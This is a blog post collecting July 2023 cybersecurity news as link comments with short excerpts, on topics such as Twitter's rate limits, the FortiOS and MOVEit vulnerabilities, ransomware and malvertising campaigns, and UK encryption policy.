This posting is here to collect cyber security news in July 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
This posting is here to collect cyber security news in July 2023.
I post links to security vulnerability news to comments of this article.
You are also free to post related links to comments.
183 Comments
Tomi Engdahl says:
Elon Musk Announces ‘Temporary’ Reading Limit On Twitter Amid Outage
https://www.forbes.com/sites/tylerroush/2023/07/01/elon-musk-announces-temporary-reading-limit-for-unverified-twitter-accounts-amid-outage/?utm_source=facebook&utm_medium=social&utm_campaign=forbes&utm_term=se-breaking&sh=184d8a6575fa
Elon Musk announced new “temporary” reading limits for Twitter accounts on Saturday, the latest change for the social media platform by Musk, as thousands of users were unable to access the site.
Tomi Engdahl says:
Twitter limits the number of tweets users can read amid extended outage
https://techcrunch.com/2023/07/01/twitter-imposes-limits-on-the-number-of-tweets-users-can-read-amid-extended-outage/
Twitter applies temporary reading limits amid ongoing problems with platform
Elon Musk has announced viewing limits for Twitter users due to ‘extreme’ data scraping
https://www.independent.co.uk/tech/elon-musk-is-twitter-down-b2367856.html#Echobox=1688235420
Tomi Engdahl says:
Elon Musk claims Twitter’s new login requirement is a ‘temporary’ response to data scrapers
A Twitter engineer said the change would be reversed “in the near future.”
https://www.engadget.com/elon-musk-claims-twitters-new-login-requirement-is-a-temporary-response-to-data-scrapers-160041528.html
Tomi Engdahl says:
Twitter temporarily restricts tweets users can see, Elon Musk announces
https://www.bbc.com/news/technology-66077195
Tomi Engdahl says:
Proxyjacking: The Latest Cybercriminal Side Hustle https://www.akamai.com/blog/security-research/proxyjacking-new-campaign-cybercriminal-side-hustle
The Akamai Security Intelligence Response Team (SIRT) has discovered a proxyjacking campaign that is targeting vulnerable SSH servers, then launching Docker services that share the victim’s bandwidth for money.
This campaign uses a compromised web server to distribute necessary dependencies, actively searches for and removes competing instances, and employs obfuscation techniques to evade detection.
Tomi Engdahl says:
Spyware app LetMeSpy hacked, tracked user data posted online https://www.malwarebytes.com/blog/news/2023/06/phone-monitoring-app-letmespy-hacked-victim-data-posted-online
Stalkerware-type app LetMeSpy says it has been hacked, with the attacker taking user data with it.
Tomi Engdahl says:
Malvertising Used as Entry Vector for BlackCat, Actors Also Leverage SpyBoy Terminator https://www.trendmicro.com/en_us/research/23/f/malvertising-used-as-entry-vector-for-blackcat-actors-also-lever.html
Recently, the Trend Micro incident response team engaged with a targeted organization after having identified highly suspicious activities through the Targeted Attack Detection (TAD) service. In the investigation, malicious actors used malvertising to distribute a piece of malware via cloned webpages of legitimate organizations. In this case, the distribution involved a webpage of the well-known application WinSCP, an open-source Windows application for file transfer.
Advertising platforms like Google Ads enable businesses to display advertisements to target audiences to boost traffic and increase sales.
Malware distributors abuse the same functionality in a technique known as malvertising, where chosen keywords are hijacked to display malicious ads that lure unsuspecting search engine users into downloading certain types of malware.
Tomi Engdahl says:
Beware: New ‘Rustbucket’ Malware Variant Targeting macOS Users https://thehackernews.com/2023/07/beware-new-rustbucket-malware-variant.html
Researchers have pulled back the curtain on an updated version of an Apple macOS malware called Rustbucket that comes with improved capabilities to establish persistence and avoid detection by security software
Tomi Engdahl says:
Hackers Exploiting Unpatched WordPress Plugin Flaw to Create Secret Admin Accounts https://thehackernews.com/2023/07/unpatched-wordpress-plugin-flaw-could.html
As many as 200,000 WordPress websites are at risk of ongoing attacks exploiting a critical unpatched security vulnerability in the Ultimate Member plugin.
The flaw, tracked as CVE-2023-3460 (CVSS score: 9.8), impacts all versions of the Ultimate Member plugin, including the latest version (2.6.6) that was released on June 29, 2023.
“This is a very serious issue: unauthenticated attackers may exploit this vulnerability to create new user accounts with administrative privileges, giving them the power to take complete control of affected sites,” WordPress security firm WPScan said in an alert.
Tomi Engdahl says:
Elon Musk sets new daily Twitter limits for users https://www.washingtonpost.com/technology/2023/07/01/elon-musk-new-twitter-user-limits/
Elon Musk announced Saturday that Twitter will temporarily limit the number of tweets users can read per day — with separate limits for paid and unpaid users — to combat computer programs that comb through posts to extract useful data from the platform.
It’s unclear how long the limits will last, and what lifting them will depend on. Musk did not respond to a request for comment.
Under the new limits, verified accounts will be limited to reading 6,000 posts per day while unverified accounts will have access to 600 per day, Musk tweeted. New unverified users, who join the platform after Saturday’s announcement, can only access 300 posts per day.
Tomi Engdahl says:
MEPs prepare to battle on spyware exemption in EU media law https://www.euractiv.com/section/media/news/meps-prepare-to-battle-on-spyware-exemption-in-eu-media-law/
As the Media Freedom Act moves on in the European Parliament, the real elephant in the room has become a provision introduced in the EU Council’s version that would allow authorities to spy on journalists for national security reasons.
Tomi Engdahl says:
Several US states investigating ‘SiegedSec’ hacking campaign https://therecord.media/states-investigate-siegedsec-hacking-campaign
Officials in multiple states are investigating claims by a suspected politically motivated hacking group that websites connected to local governments were breached or defaced.
This week, the SiegedSec group took to Telegram to claim cyberattacks on five state-run websites:
Nebraska Supreme Court intranet, South Dakota Boards and Commissions, Texas State BHEC Personal Information, Pennsylvania Provider Self-Service, South Carolina Criminal Justice Information Services (CJIS)
The group shared photos of the websites being defaced, as well as allegedly stolen data. No motive for the attacks was listed in the post but in previous attacks on government bodies in Texas, Kentucky and Arkansas, the group explicitly referenced political issues that prompted their attacks
Tomi Engdahl says:
MITRE Unveils Top 25 Most Dangerous Software Weaknesses of 2023: Are You at Risk?
https://thehackernews.com/2023/06/mitre-unveils-top-25-most-dangerous.html
MITRE has released its annual list of the Top 25 “most dangerous software weaknesses” for the year 2023.
“These weaknesses lead to serious vulnerabilities in software,” the U.S.
Cybersecurity and Infrastructure Security Agency (CISA) said. “An attacker can often exploit these vulnerabilities to take control of an affected system, steal data, or prevent applications from working.”
The list is based on an analysis of public vulnerability data in the National Vulnerability Data (NVD) for root cause mappings to CWE weaknesses for the previous two years. A total of 43,996 CVE entries were examined and a score was attached to each of them based on prevalence and severity.
Tomi Engdahl says:
Iranian Hackers Using POWERSTAR Backdoor in Targeted Espionage Attacks https://thehackernews.com/2023/06/iranian-hackers-charming-kitten-utilize.html
Charming Kitten, the nation-state actor affiliated with Iran’s Islamic Revolutionary Guard Corps (IRGC), has been attributed to a bespoke spear-phishing campaign that delivers an updated version of a fully-featured PowerShell backdoor called POWERSTAR.
“There have been improved operational security measures placed in the malware to make it more difficult to analyze and collect intelligence,” Volexity researchers Ankur Saini and Charlie Gardner said in a report published this week.
Tomi Engdahl says:
CVE-2023-27997 Is Exploitable, and 69% of FortiGate Firewalls Are Vulnerable https://bishopfox.com/blog/cve-2023-27997-exploitable-and-fortigate-firewalls-vulnerable
Bishop Fox internally developed an exploit for CVE-2023-27997, a heap overflow in FortiOS—the OS behind FortiGate firewalls—that allows remote code execution. There are 490,000 affected SSL VPN interfaces exposed on the internet, and roughly 69% of them are currently unpatched. You should patch yours now.
Tomi Engdahl says:
Andy Baio / Waxy.org:
A developer says Twitter appears to be DDoSing itself via a Twitter web app JavaScript bug, which could be tied to Elon Musk’s emergency blocks and rate limits — For the last two days, Elon Musk has claimed that Twitter is under attack from “several hundred organizations” who were conducting …
Twitter bug causes self-DDOS tied to Elon Musk’s emergency blocks and rate limits: “It’s amateur hour”
https://waxy.org/2023/07/twitter-bug-causes-self-ddos-possibly-causing-elon-musks-emergency-blocks-and-rate-limits-its-amateur-hour/
For the last two days, Elon Musk has claimed that Twitter is under attack from “several hundred organizations” who were conducting “EXTREME levels of data scraping,” forcing them to bring “large numbers of servers online on an emergency basis” and enact emergency measures.
Yesterday, Twitter started blocking all logged-out access to Twitter, requiring signing in to view any tweet or profile. Elon Musk called it a “temporary emergency measure,” claiming they “were getting data pillaged so much that it was degrading service for normal users!”
Apparently, it didn’t stop the crush of traffic and, this morning, Musk announced they escalated their actions against supposed “extreme levels of data scraping” by rate-limiting the number of tweets you can view.
Immediately, Twitter users started seeing “Rate Limit Exceeded” messages and every trending topic was about the collapse of Twitter:
Are shadowy AI companies scraping Twitter for training data? Maybe!
But on Mastodon this morning, web developer Sheldon Chang noticed another source of unusual traffic: a bug in Twitter’s web app that is constantly sending requests to Twitter in an infinite loop:
This is hilarious. It appears that Twitter is DDOSing itself.
The Twitter home feed’s been down for most of this morning. Even though nothing loads, the Twitter website never stops trying and trying.
In the first video, notice the error message that I’m being rate limited. Then notice the jiggling scrollbar on the right.
The second video shows why it’s jiggling. Twitter is firing off about 10 requests a second to itself to try and fetch content that never arrives because Elon’s latest genius innovation is to block people from being able to read Twitter without logging in.
This likely created some hellish conditions that the engineers never envisioned and so we get this comedy of errors resulting in the most epic of self-owns, the self-DDOS.
Unbelievable. It’s amateur hour.
Manish Singh / TechCrunch:
Elon Musk says Twitter has temporarily limited verified accounts to reading 10K posts/day, unverified 1K, and new unverified 500, due to “extreme” data scraping — Twitter is putting limits to how many tweets its users can read as the Elon Musk-owned service suffers extended outage …
Twitter limits the number of tweets users can read amid extended outage
https://techcrunch.com/2023/07/01/twitter-imposes-limits-on-the-number-of-tweets-users-can-read-amid-extended-outage/
Tomi Engdahl says:
Matt Binder / Mashable:
Elon Musk claims the Twitter login requirement is a “temporary emergency measure” as “several hundred organizations” were scraping data “extremely aggressively”
https://mashable.com/article/elon-musk-twitter-login-requirement-temporary
Tomi Engdahl says:
https://thehackernews.com/2023/07/blackcat-operators-distributing.html
“Threat actors associated with the BlackCat ransomware have been observed employing malvertising tricks to distribute rogue installers of the WinSCP file transfer application.”
Tomi Engdahl says:
DNS TXT Records Can Be Used by Hackers to Execute Malware
https://cybersecuritynews.com/dns-txt-records-to-execute-malware/
ASEC from AhnLab has confirmed the use of DNS TXT Records in malware execution, which is a rare technique that holds importance for detection and analysis purposes.
Tomi Engdahl says:
Ison-Britannian hallitus haluaa murentaa päästä-päähän-salauksen – Apple nousi barrikadeille https://www.tivi.fi/uutiset/tv/a11cd206-7891-4005-9dcc-00c661b40c4a
BBC:n mukaan Apple on liittynyt 80 organisaation ja teknologia-asiantuntijan joukkoon, jotka vaativat Ison-Britannian teknologiaministeri Chloe Smithiä harkitsemaan lakiesitystä uudelleen. Apple korostaa, että lain pitäisi suojella yksityisyyttä, kun taas Britannian hallitus korostaa alustojen velvollisuutta torjua lasten seksuaalista hyväksikäyttöä.
Tomi Engdahl says:
Dublin Airport staff pay details stolen by hackers after MOVEit attack at third-party provider https://www.bitdefender.com/blog/hotforsecurity/dublin-airport-staff-pay-details-stolen-by-hackers-after-moveit-attack-at-third-party-provider/
Staff at Dublin Airport have been warned that their personal data has fallen into the hands of hackers, following a data breach at a third-party service provider.
Some 2000 employees of DAA, the operator of Dublin airport, have had their pay and benefit details stolen after cybercriminals exploited a vulnerability in the MOVEit – a file-transfer tool used by many businesses to transfer files.
Tomi Engdahl says:
Decryptor publicly released for Akira ransomware used in several high-profile incidents https://therecord.media/decryptor-released-for-akira-ransomware-avast
A cybersecurity firm released a decryptor for the Akira ransomware, providing a way forward for dozens of victims that have dealt with attacks since the gang emerged in March 2023.
Several experts told Recorded Future News that a decryptor for the ransomware had been used quietly among incident responders for months before cybersecurity firm Avast developed and released its version for public download.
Tomi Engdahl says:
Apple, Civil Liberty Groups Condemn UK Online Safety Bill
https://www.securityweek.com/apple-civil-liberty-groups-condemn-uk-online-safety-bill/
Fears mount that UK Online Safety Bill may include a requirement for an encrypted message scanning capability.
The latest variant of the crypto wars is happening now, with the UK and EU governments attempting to force backdoors into end-to-end encryption (E2EE).
The war is law enforcement and government desire to prevent criminals ‘going dark’ through E2EE. The battlefield for liberal democracies is the EU (the Child Sexual Abuse Regulation) and the UK (the Online Safety Bill – OSB). The collateral damage could be every law abiding citizen – and the audience is all other liberal democracies around the world.
On June 26, 2023, the Online Rights Group delivered an open letter (PDF) signed by 80 technologists and civil rights organizations to Chloe Smith, the UK government minister guiding the OSB through parliament. The biggest concern is the likely requirement for an encrypted message scanning capability. The open letter warns:
“The scanning software would have to be pre-installed on people’s phones, without their permission or full awareness of the severe privacy and security implications. The underlying databases can be corrupted by hostile actors, meaning that individual phones would become vulnerable to attack. The breadth of the measures proposed in the Online Safety Bill – which would infringe the rights to privacy to the same extent for the internet’s majority of legitimate law-abiding users as it would for potential criminals…”
Tomi Engdahl says:
Malicious extensions in the Chrome Web Store https://www.kaspersky.com/blog/dangerous-chrome-extensions-87-million/48562/
Not so long ago, a few dozen malicious plugins were discovered in the Chrome Web Store (the official browser extension store for Google Chrome). The most popular of these extensions had over nine million downloads, and altogether these plugins had been downloaded around 87 million times.
Tomi Engdahl says:
DDoSia Attack Tool Evolves with Encryption, Targeting Multiple Sectors https://thehackernews.com/2023/07/ddosia-attack-tool-evolves-with.html
The threat actors behind the DDoSia attack tool have come up with a new version that incorporates a new mechanism to retrieve the list of targets to be bombarded with junk HTTP requests in an attempt to bring them down.
The updated variant, written in Golang, “implements an additional security mechanism to conceal the list of targets, which is transmitted from the [command-and-control] to the users,” cybersecurity company Sekoia said in a technical write-up.
Tomi Engdahl says:
Google Analytics data transfer to U.S. brings $1 million fine to Swedish firms https://www.bleepingcomputer.com/news/security/google-analytics-data-transfer-to-us-brings-1-million-fine-to-swedish-firms/
The Swedish Authority for Privacy Protection (Integritetsskyddsmyndigheten –
IMY) has fined two companies with 12.3 million SEK (€1 million/$1.1 million) for using Google Analytics and warned two others about the same practice.
In a decision published yesterday, the agency explains that by using Google Analytics to generate web statistics the firms were breaching European Union’s General Data Protection Regulation (GDPR).
Specifically, the companies were in violation of the GDPR Article 46(1), which forbids the transfer of personal data to countries or international organizations that lack safeguards that warrant safety and legal remediation mechanisms.
Tomi Engdahl says:
New Python tool checks NPM packages for manifest confusion issues https://www.bleepingcomputer.com/news/security/new-python-tool-checks-npm-packages-for-manifest-confusion-issues/
A security researcher and system administrator has developed a tool that can help users check for manifest mismatches in packages from the NPM JavaScript software registry.
Last week, a former engineering manager at GitHub and NPM, Darcy Clarke, warned about “manifest confusion” problems that could introduce the risk of malware hiding in dependencies or executing scripts during installation.
Tomi Engdahl says:
Firefox 115 Patches High-Severity Use-After-Free Vulnerabilities
https://www.securityweek.com/firefox-115-patches-high-severity-use-after-free-vulnerabilities/
Mozilla has released Firefox 115 to the stable channel with patches for two high-severity use-after-free vulnerabilities.
Mozilla on Tuesday announced the release of Firefox 115 to the stable channel with patches for a dozen vulnerabilities, including two high-severity use-after-free bugs.
Tracked as CVE-2023-37201, the first of the high-severity issues is described as a use-after-free flaw in WebRTC certificate generation.
An open source project, WebRTC enables real-time communication in web browsers and mobile applications, via application programming interfaces (APIs).
“An attacker could have triggered a use-after-free condition when creating a WebRTC connection over HTTPS,” Mozilla explains in an advisory.
The second high-severity vulnerability, CVE-2023-37202, is described as a potential use-after-free issue from compartment mismatch in the open source JavaScript and WebAssembly engine SpiderMonkey.
“Cross-compartment wrappers wrapping a scripted proxy could have caused objects from other compartments to be stored in the main compartment resulting in a use-after-free,” Mozilla says.
Mozilla Foundation Security Advisory 2023-22
Security Vulnerabilities fixed in Firefox 115
https://www.mozilla.org/en-US/security/advisories/mfsa2023-22/
Tomi Engdahl says:
You’ve patched right? ’340K+ Fortinet firewalls’ wide open to critical security bug > https://go.theregister.com/feed/www.theregister.com/2023/07/03/338000_fortinet_firewalls_vulnerability/, 2023-07-03 23:17:07 +0000
Tomi Engdahl says:
Ransomware Criminals Are Dumping Kids’ Private Files Online After School Hacks https://www.securityweek.com/ransomware-criminals-are-dumping-kids-private-files-online-after-school-hacks/
The confidential documents stolen from schools and dumped online by ransomware gangs are raw, intimate and graphic. They describe student sexual assaults, psychiatric hospitalizations, abusive parents, truancy — even suicide attempts.
Complete sexual assault case folios containing these details were among more than 300,000 files dumped online in March after the 36,000-student Minneapolis Public Schools refused to pay a $1 million ransom. Other exposed data included medical records, discrimination complaints, Social Security numbers and contact information of district employees.
Tomi Engdahl says:
Researchers call for UK, EU to heed scientific evaluation of client-side scanning proposals https://therecord.media/encrypted-messaging-client-side-scanning-uk-eu-proposals
Scientists and researchers are criticizing both the United Kingdom’s and European Union’s proposals that could allow national authorities to mandate the use of client-side scanning technologies on encrypted messaging apps.
Experts from the U.K.’s National Research Centre on Privacy, Harm Reduction and Adversarial Influence Online (REPHRAIN) this week called on politicians in Britain “to consider independent scientific evaluation before voting through the online safety bill,” which is currently sitting with the U.K.’s House of Lords for scrutiny.
Their calls were echoed by more than 300 signatories to a joint statement sent to the European Council and Parliament warning that the EU’s proposed Child Sexual Abuse Regulation risks both failing to protect children and introducing new potential for harms.
Tomi Engdahl says:
Ransomware
Japan’s Nagoya Port Suspends Cargo Operations Following Ransomware Attack
Japan’s Port of Nagoya this week suspended cargo loading and unloading operations following a ransomware attack.
https://www.securityweek.com/japans-nagoya-port-suspends-cargo-operations-following-ransomware-attack/
Tomi Engdahl says:
Exploited Solar Power Product Vulnerability Could Expose Energy Organizations to Attacks
https://www.securityweek.com/exploited-solar-power-product-vulnerability-could-expose-energy-organizations-to-attacks/
An actively exploited vulnerability in the Contec SolarView solar power monitoring product can expose hundreds of energy organizations to attacks.
Hundreds of energy organizations could be exposed to attacks due to an actively exploited vulnerability affecting a solar power monitoring product made by Contec, vulnerability intelligence company VulnCheck warned on Wednesday.
Contec specializes in custom embedded computing, industrial automation, and IoT communication technology. The company’s SolarView solar power monitoring and visualization product is used at more than 30,000 power stations, according to its website.
Palo Alto Networks reported on June 22 that a Mirai variant has been exploiting a vulnerability in SolarView to hack devices and ensnare them into a botnet. The flaw, CVE-2022-29303, is one of the nearly two dozen targeted by the botnet.
CVE-2022-29303 is described as a code injection issue affecting SolarView version 6.0. The vulnerability can be exploited remotely by unauthenticated attackers.
VulnCheck’s analysis indicates that the security hole was only patched with the release of version 8.0 and versions dating back to at least 4.0 are impacted.
Tomi Engdahl says:
Jonathan Greig / The Record:
After Fortinet patched a major FortiOS bug on June 12, researchers find that ~336K out of ~490K affected SSL VPN interfaces are still unpatched and open to RCE
Nearly 70% of FortiGate Firewalls are vulnerable to new bug, experts say
https://therecord.media/fortigate-firewalls-vulnerable-to-new-bug
Cybersecurity experts are raising the alarm about a new vulnerability that leaves hundreds of thousands of Fortinet customers vulnerable to attack.
Concerns about the issue — tracked as CVE-2023-27997 — grew last month due to how widely used Fortinet’s SSL-VPN product is among government organizations. Fortinet released a patch in June for the bug, which has a “critical” severity score of 9.8 out of 10 and was discovered by Lexfo Security vulnerability researchers.
Fortinet said the issue “may have been exploited in a limited number of cases” and noted that the hacking campaign was “targeted at government, manufacturing, and critical infrastructure.”
Tomi Engdahl says:
Apps with 1.5M installs on Google Play send your data to China https://www.bleepingcomputer.com/news/security/apps-with-15m-installs-on-google-play-send-your-data-to-china/
Security researchers discovered two malicious file management applications on Google Play with a collective installation count of over 1.5 million that collected excessive user data that goes well beyond what’s needed to offer the promised functionality.
The apps, both from the same publisher, can launch without any interaction from the user to steal sensitive data and send it to servers in China.
Despite being reported to Google, the two apps continue to be available in Google Play at the time of publishing.
Tomi Engdahl says:
Welcome to New York: Exploring TA453′s Foray into LNKs and Mac Malware https://www.proofpoint.com/us/blog/threat-insight/welcome-new-york-exploring-ta453s-foray-lnks-and-mac-malware
In mid-May 2023, TA453—also known publicly as Charming Kitten, APT42, Mint Sandstorm, Yellow Garuda—sent a benign conversation lure masquerading as a senior fellow with the Royal United Services Institute (RUSI) to the public media contact for a nuclear security expert at a US-based think tank focused on foreign affairs. The email solicited feedback on a project called “Iran in the Global Security Context” and requested permission to send a draft for review. The initial email also mentioned participation from other well-known nuclear security experts TA453 has previously masqueraded as, in addition to offering an honorarium. TA453 eventually used a variety of cloud hosting providers to deliver a novel infection chain that deploys the newly identified PowerShell backdoor GorjolEcho. When given the opportunity, TA453 ported its malware and attempted to launch an Apple flavored infection chain dubbed NokNok by Proofpoint. TA453 also employed multi-persona impersonation in its unending espionage quest.
Tomi Engdahl says:
Surviving the 800 Gbps Storm: Gain Insights from Gcore’s 2023 DDoS Attack Statistics https://thehackernews.com/2023/07/surviving-800-gbps-storm-gain-insights.html
Gcore Radar is a quarterly report prepared by Gcore that provides insights into the current state of the DDoS protection market and cybersecurity trends.
This report offers you an understanding of the evolving threat landscape and highlights the measures required to protect against attacks effectively. It serves as an insight for businesses and individuals seeking to stay informed about the latest developments in cybersecurity.
As we entered 2023, the cybersecurity landscape witnessed an increase in sophisticated, high-volume attacks. Here, we present the current state of the DDoS protection market based on Gcore’s statistics.
Tomi Engdahl says:
Malicious ad for USPS fishes for banking credentials https://www.malwarebytes.com/blog/threat-intelligence/2023/07/malicious-ad-for-usps-phishes-for-jpmorgan-chase-credentials
We often think of malvertising as being malicious ads that push malware or scams, and quite rightly so these are probably the most common payloads.
However, malvertising is also a great vehicle for phishing attacks which we usually see more often via spam emails.
Threat actors continue to abuse and impersonate brands, posing as verified advertisers whose only purpose is to smuggle rogue ads via popular search engines. In this blog post, we review a recent phishing attack that was targeting both mobile and Desktop users looking up to track their packages via the United States Postal Service website.
Tomi Engdahl says:
Taking over Milesight UR32L routers behind a VPN: 22 vulnerabilities and a full chain https://blog.talosintelligence.com/talos-discovers-17-vulnerabilities-in-milesight/
Cisco Talos recently discovered several vulnerabilities in Milesight‘s UR32L – an ARMv7 Linux-based industrial cellular router — and Milesight’s MilesightVPN, a remote access solution for Milesight devices.
In all, Cisco Talos is releasing 22 security advisories today, nine of which have a CVSS score greater than 8, associated with 69 CVEs. Talos is disclosing these vulnerabilities despite no official fix from Milesight, in adherence to Cisco’s vulnerability disclosure policy. Milesight did not respond appropriately during the 90-day period as outlined in the policy.
Tomi Engdahl says:
Researchers Uncover New Linux Kernel ‘StackRot’ Privilege Escalation Vulnerability https://thehackernews.com/2023/07/researchers-uncover-new-linux-kernel.html
Details have emerged about a newly identified security flaw in the Linux kernel that could allow a user to gain elevated privileges on a target host.
Dubbed StackRot (CVE-2023-3269, CVSS score: 7.8), the flaw impacts Linux versions 6.1 through 6.4. There is no evidence that the shortcoming has been exploited in the wild to date.
“As StackRot is a Linux kernel vulnerability found in the memory management subsystem, it affects almost all kernel configurations and requires minimal capabilities to trigger,” Peking University security researcher Ruihan Li said.
“However, it should be noted that maple nodes are freed using RCU callbacks, delaying the actual memory deallocation until after the RCU grace period.
Consequently, exploiting this vulnerability is considered challenging.”
Tomi Engdahl says:
The Register: Microsoft puts out Outlook fire, says ‘everything’s fine’ with Teams malware flaw > https://go.theregister.com/feed/www.theregister.com/2023/07/06/microsoft_outlook_teams_flaws/, 2023-07-06 21:20:10 +0000
Tomi Engdahl says:
Wired Threat Level: How Threads’ Privacy Policy Compares to Twitter’s (and Its Rivals’) > https://www.wired.com/story/meta-twitter-threads-bluesky-spill-hive-mastodon-privacy-comparison/, 2023-07-06 23:46:55 +0000
Tomi Engdahl says:
Truebot RCE attacks exploit critical Netwrix Auditor bug https://www.scmagazine.com/news/threat-intelligence/truebot-rce-critical-netwrix-bug
Organizations in the U.S. and Canada are being targeted by new versions of the Truebot downloader trojan botnet, adapted to exploit a critical remote code execution (RCE) vulnerability in Netwrix Auditor software.
TrueBot, also known as Silence.Downloader, has been tied to a suspected Russian threat operation Silence, which is linked to Evil Corp and the TA505 threat cluster. The Clop ramsonware gang, recently in the headlines for its attacks on MOVEit Transfer users, is among those who have previously used Truebot to exfiltrate data from victims.
Truebot variants have previously been delivered primarily via malicious phishing email attachments, the advisory said. With the newly observed versions, however, access to compromised systems can also be gained by exploiting a now-patched RCE vulnerability in Netwrix Auditor, a tool for tracking and analyzing changes in IT environments.
Tomi Engdahl says:
Mastodon fixes critical “TootRoot” vulnerability allowing node hijacking https://arstechnica.com/security/2023/07/mastodon-fixes-critical-tootroot-vulnerability-allowing-node-hijacking/
The maintainers of the open source software that powers the Mastodon social network published a security update on Thursday that patches a critical vulnerability making it possible for hackers to backdoor the servers that push content to individual users.
“Using carefully crafted media files, attackers can cause Mastodon’s media processing code to create arbitrary files at any location,” Mastodon said.
“This allows attackers to create and overwrite any file Mastodon has access to, allowing Denial of Service and arbitrary Remote Code Execution.”
In a Mastodon post, independent security researcher Kevin Beaumont went a step further, writing that exploiting the vulnerability allowed someone “to send a toot which makes a webshell on instances that process said toot.” He coined the name #TootRoot because user posts, known as toots, allowed hackers to potentially gain root access to instances.
Tomi Engdahl says:
CISA warns govt agencies to patch actively exploited Android driver https://www.bleepingcomputer.com/news/security/cisa-warns-govt-agencies-to-patch-actively-exploited-android-driver/
CISA ordered federal agencies today to patch a high-severity Arm Mali GPU kernel driver privilege escalation flaw added to its list of actively exploited vulnerabilities and addressed with this month’s Android security updates.
The flaw (tracked as CVE-2021-29256) is a use-after-free weakness that can let attackers escalate to root privileges or gain access to sensitive information on targeted Android devices by allowing improper operations on GPU memory.
U.S. Federal Civilian Executive Branch Agencies (FCEB) have been given until July 28th to secure their devices against attacks targeting the CVE-2021-29256 vulnerability added to CISA’s list of Known Exploited Vulnerabilities today.
According to the binding operational directive (BOD 22-01) issued in November 2021, federal agencies are bound to thoroughly assess and address any security flaws outlined in CISA’s KEV catalog.
Tomi Engdahl says:
Solar monitoring systems exposed: Secure your devices https://www.malwarebytes.com/blog/news/2023/07/solar-monitoring-systems-exposed-secure-your-devices
Researchers who go looking for devices exposed to the Internet report “tens of thousands” of solar photovoltaic (PV) monitoring and diagnostic systems can be found on the web. The systems are used for everything from system optimization to performance monitoring and troubleshooting.
No fewer than 134,000 products from an assortment of vendors were found to be exposed, though as Bleeping Computer notes, this does not necessarily mean they’re all vulnerable right now.
Indeed, the research highlights that around 7,000 devices belonging to one particular brand are in the list. A separate report linked by Bleeping Computer found 425 examples of said device making use of a firmware version known to be vulnerable to attack. As per said report, which cleverly makes use of a copyright string on the product’s landing page to work out which versions are vulnerable:
Tomi Engdahl says:
MOVEit Postmortem
https://explore.avertium.com/resource/moveit-postmortem
June 2023 marked the beginning of Progress Software’s MOVEit file transfer zero-days. The initial vulnerability, CVE-2023-34362, was identified as an SQL injection flaw that could lead to escalated privileges and unauthorized access to victims’ environments.
Shortly after discovering this, Progress found additional critical SQL injection vulnerabilities that could allow attackers to steal data from customer databases. Exploitation of these vulnerabilities could allow attackers to compromise internet-exposed servers and manipulate or extract customer information without authentication. The flaws are now tracked as
CVE-2023-35708 and CVE-2023-35036.
Although Progress promptly released patches, the Clop ransomware gang proved even quicker, leading to the compromise of several companies in the subsequent weeks. Let’s dive into the ongoing devastation caused by the MOVEit vulnerabilities and the threat actor targeting organizations.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/moveit-transfer-customers-warned-to-patch-new-critical-flaw/?fbclid=IwAR22SofsoTY1slDxaxxHym6CW-AdoXhLco6E6UPBJu1Ab6B6Beu2D6FFErc
Tomi Engdahl says:
ICS/OT
Vulnerabilities in PiiGAB Product Could Expose Industrial Organizations to Attacks
https://www.securityweek.com/vulnerabilities-in-piigab-product-could-expose-industrial-organizations-to-attacks/
Potentially serious vulnerabilities discovered by researchers in a PiiGAB product could expose industrial organizations to remote hacker attacks.
Potentially serious vulnerabilities discovered by researchers in a PiiGAB product could expose industrial organizations to remote hacker attacks.
PiiGAB is a Sweden-based company that provides industrial and building automation hardware and software solutions.
Researchers Floris Hendriks and Jeroen Wijenbergh conducted an in-depth security assessment of PiiGAB’s M-Bus 900s gateway/converter as part of their master’s in cybersecurity at Radboud University in the Netherlands. The product is designed for the remote monitoring of devices using the M-Bus protocol.
“For example, the device is connected to electricity meters, water meters but also heat pumps, cooling units and PLC devices. This means that this product can be used to communicate with a large ecosystem of ICS devices,” the researchers told SecurityWeek.
The vendor has been notified and it has released updates that should address the security holes.
Tomi Engdahl says:
https://www.securityweek.com/iranian-cyberspies-target-us-based-think-tank-with-new-macos-malware/